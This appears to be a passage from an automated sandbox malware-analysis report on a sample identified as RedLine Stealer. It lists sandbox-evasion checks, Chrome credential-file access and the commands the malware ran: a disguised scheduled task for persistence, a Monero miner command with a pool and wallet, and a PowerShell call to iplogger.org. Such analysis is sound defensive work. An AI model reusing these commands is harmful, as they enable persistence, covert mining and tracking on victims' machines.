                  Source: C:\Users\user\AppData\Local\Temp\evs.exe; File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exe; Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe; Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exe; Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; Window / User API: threadDelayed 2039
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; Window / User API: threadDelayed 6722
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exe TID: 6776; Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exe TID: 6760; Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe TID: 5868; Thread sleep time: -56000s >= -30000s
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe TID: 68; Thread sleep time: -13835058055282155s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\evs.exe TID: 6376; Thread sleep count: 256 > 30
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe TID: 5144; Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exe TID: 5312; Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5200; Thread sleep count: 293 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5232; Thread sleep count: 74 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5200; Thread sleep count: 143 > 30
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe; Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\evs.exe; Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\jo.exe; Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\evs.exe; Code function: 22_2_004062F0 FindFirstFileA,FindClose,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exe; Code function: 22_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exe; Code function: 22_2_00402765 FindFirstFileA,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exe; Code function: 31_2_008B7AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
                  Source: nulhfhsi.exe, 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp; Binary or memory string: VMware
                  Source: nulhfhsi.exe, 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp; Binary or memory string: Win32_VideoController(Standard display types)VMwareYK1H39RCWin32_VideoControllerL119UEN9VideoController120060621000000.000000-0009.651068display.infMSBDAN6M7_V_6PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsSBCU13XE~
                  Source: nulhfhsi.exe, 00000004.00000003.266096274.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.269731993.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295282731.0000000001840000.00000004.00000001.sdmp; Binary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: cpu.exe, 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmp; Binary or memory string: Hyper-V RAW i(
                  Source: cpu.exe, 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmp; Binary or memory string: Hyper-V RAW
                  Source: nulhfhsi.exe; Binary or memory string: VMWare
                  Source: nulhfhsi.exe, 00000004.00000003.266305328.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.270040441.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295918673.0000000001840000.00000004.00000001.sdmp; Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmp; Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmp; Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: nulhfhsi.exe, 00000004.00000003.266384514.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.269413903.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295086735.0000000001840000.00000004.00000001.sdmp; Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
                  Source: nulhfhsi.exe, 00000004.00000003.266436615.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.269511334.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295168811.0000000001840000.00000004.00000001.sdmp; Binary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
                  Source: nulhfhsi.exe, 00000004.00000003.266199641.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.269927378.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295820103.0000000001840000.00000004.00000001.sdmp; Binary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__
                  Source: nulhfhsi.exe, 00000004.00000002.460328146.00000000016D6000.00000004.00000020.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: nulhfhsi.exe, 00000004.00000002.503459155.0000000006A56000.00000004.00000001.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmp; Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: lxoqz3o0.exe, 00000006.00000003.295501465.0000000000DC4000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll))
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exe; System information queried: ModuleInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; Process information queried: ProcessInformation

                  Anti Debugging:

                  Hides threads from debuggers
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exe; Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exe; Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe; Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; Thread information set: HideFromDebugger
                  Tries to detect sandboxes and other dynamic analysis tools (window names)
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; Open window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; Open window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; Open window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exe; Process queried: DebugPort
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exe; Process queried: DebugObjectHandle
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe; Process queried: DebugObjectHandle
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exe; Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exe; Process queried: DebugObjectHandle
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe; Process queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe; Process queried: DebugObjectHandle
                  Source: C:\Users\user\AppData\Local\Temp\revs.exe; Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess queried: DebugObjectHandle
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_004261F0 IsDebuggerPresent,DebuggerProbe,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_004111C0 InterlockedIncrement,__itow_s,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcscpy_s,_wcscpy_s,_wcscat_s,_wcscat_s,_wcscat_s,__snwprintf_s,_wcscpy_s,_wcscpy_s,__cftoe,__lock,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__itow_s,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00412560 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00850D90 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_0085092B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00AB18BB push dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00427790 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,__get_osfhandle,SetEndOfFile,GetLastError,__lseeki64_nolock,
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00412D20 SetUnhandledExceptionFilter,
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeMemory allocated: page read and write | page guard
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess created: C:\Users\user\AppData\Local\nulhfhsi.exe 'C:\Users\user\AppData\Local\nulhfhsi.exe'
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess created: C:\Users\user\AppData\Local\lxoqz3o0.exe 'C:\Users\user\AppData\Local\lxoqz3o0.exe'
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess created: C:\Users\user\AppData\Local\Temp\evs.exe 'C:\Users\user\AppData\Local\Temp\evs.exe'
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess created: C:\Users\user\AppData\Local\Temp\revs.exe 'C:\Users\user\AppData\Local\Temp\revs.exe'
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe 'hello_C# (2).exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\hello_C#.exe 'hello_C#.exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\jo.exe 'jo.exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                  Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
                  Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
                  Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008BA446 cpuid
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: LoadLibraryExA,SetConsoleOutputCP,GetTimeFormatW,GetLocaleInfoW,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: GetLocaleInfoA,
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeQueries volume information: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hello_C#.exe VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_004011D1 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008BA446 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information:

                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.266479217.0000000001590000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nulhfhsi.exe PID: 6988, type: MEMORY
                  Source: Yara matchFile source: 4.2.nulhfhsi.exe.3b0000.0.unpack, type: UNPACKEDPE
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: Yara matchFile source: 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.266479217.0000000001590000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nulhfhsi.exe PID: 6988, type: MEMORY
                  Source: Yara matchFile source: 4.2.nulhfhsi.exe.3b0000.0.unpack, type: UNPACKEDPE

                  Remote Access Functionality:

                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp, type: MEMORY
